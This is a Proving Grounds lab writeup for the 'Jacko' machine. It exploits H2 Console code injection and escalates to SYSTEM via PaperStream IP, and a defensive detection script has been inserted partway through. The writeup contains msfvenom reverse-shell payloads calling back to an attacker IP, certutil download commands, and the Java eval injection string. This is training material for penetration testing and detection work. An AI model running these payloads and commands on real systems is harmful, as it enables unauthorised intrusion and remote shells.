Jacko

Writeup for Jacko from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.209.66 all

Service Enumeration

HTTP (Port 8082)

Once logged in, we notice that this is running H2 Console version 1.4.199, which is vulnerable to code injection via Java.

Exploit

We can test whether this works by executing the systeminfo command.

We first generate shell.exe.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.209 LPORT=8082

Next, we transfer shell.exe via an HTTP server to the target machine.

certutil -urlcache -split -f http://192.168.49.209/home/kali/pg/jacko/shell.exe C:/Windows/Temp/shell.exe

We can then execute shell.exe to gain our reverse shell.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');

It looks like we need to fix the PATH variable first:

set PATH=%SystemRoot%\system32;%SystemRoot%;
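A detection-side counterpart to the chain above, added here and not part of the original writeup: it scans constructed process-creation events (the record shape and sample values are assumptions, loosely modelled on Sysmon event ID 1) for the two telltale signs of this exploit path, certutil fetching a remote URL and the H2 Console's java.exe spawning a shell or a binary staged in a temp directory.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed shape, loosely modelled on Sysmon event ID 1)."""
    parent: str   # parent image name, e.g. java.exe
    image: str    # created image name, e.g. certutil.exe
    cmdline: str  # full command line

# Constructed sample events reproducing the shape of the chain in this writeup; not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("java.exe", "cmd.exe",
              "cmd.exe /c certutil -urlcache -split -f http://192.168.49.209/shell.exe C:\\Windows\\Temp\\shell.exe"),
    ProcEvent("cmd.exe", "certutil.exe",
              "certutil -urlcache -split -f http://192.168.49.209/shell.exe C:\\Windows\\Temp\\shell.exe"),
    ProcEvent("java.exe", "shell.exe", "C:\\Windows\\Temp\\shell.exe"),
    ProcEvent("explorer.exe", "certutil.exe", "certutil -hashfile C:\\Users\\bob\\setup.msi SHA256"),  # benign use
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),  # benign
]

# certutil used as a downloader: -urlcache together with a remote URL on the command line
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)
# executable or DLL launched from a world-writable staging directory
STAGING_BINARY = re.compile(r"\\(Temp|Public|ProgramData)\\[^\\\s]*\.(exe|dll)\b", re.IGNORECASE)
# interpreters the H2 Console's JVM has no business launching
SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}

def classify(ev: ProcEvent) -> list[str]:
    """Return the detection names that fire for one event (empty list if benign)."""
    findings = []
    if ev.image.lower() == "certutil.exe" and CERTUTIL_DOWNLOAD.search(ev.cmdline):
        findings.append("certutil_download")
    if ev.parent.lower() == "java.exe" and (
        ev.image.lower() in SHELLS or STAGING_BINARY.search(ev.cmdline)
    ):
        findings.append("java_spawns_shell_or_staged_binary")
    return findings

def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run every event through classify(); returns (event index, detection name) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in classify(ev)]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name} <- {SAMPLE_EVENTS[idx].cmdline}")
```

The parent-child rule is the more durable of the two: a renamed downloader still has to be launched by the Console's JVM, so the java.exe parent relationship survives payload changes that defeat the command-line regex.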

Privesc

Transferring winPEAS:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.209:80/opt/PEASS-ng/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe winPEASx86.exe

Running winPEAS, we see the following.

However, neither of these works in our case.

Under the Program Files (x86) directory, we see PaperStream IP.

We can copy the PowerShell script above and generate shell.dll.

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.209 LPORT=8082

Next, we transfer both files to the target machine.

Once we run exploit.ps1, we get SYSTEM.
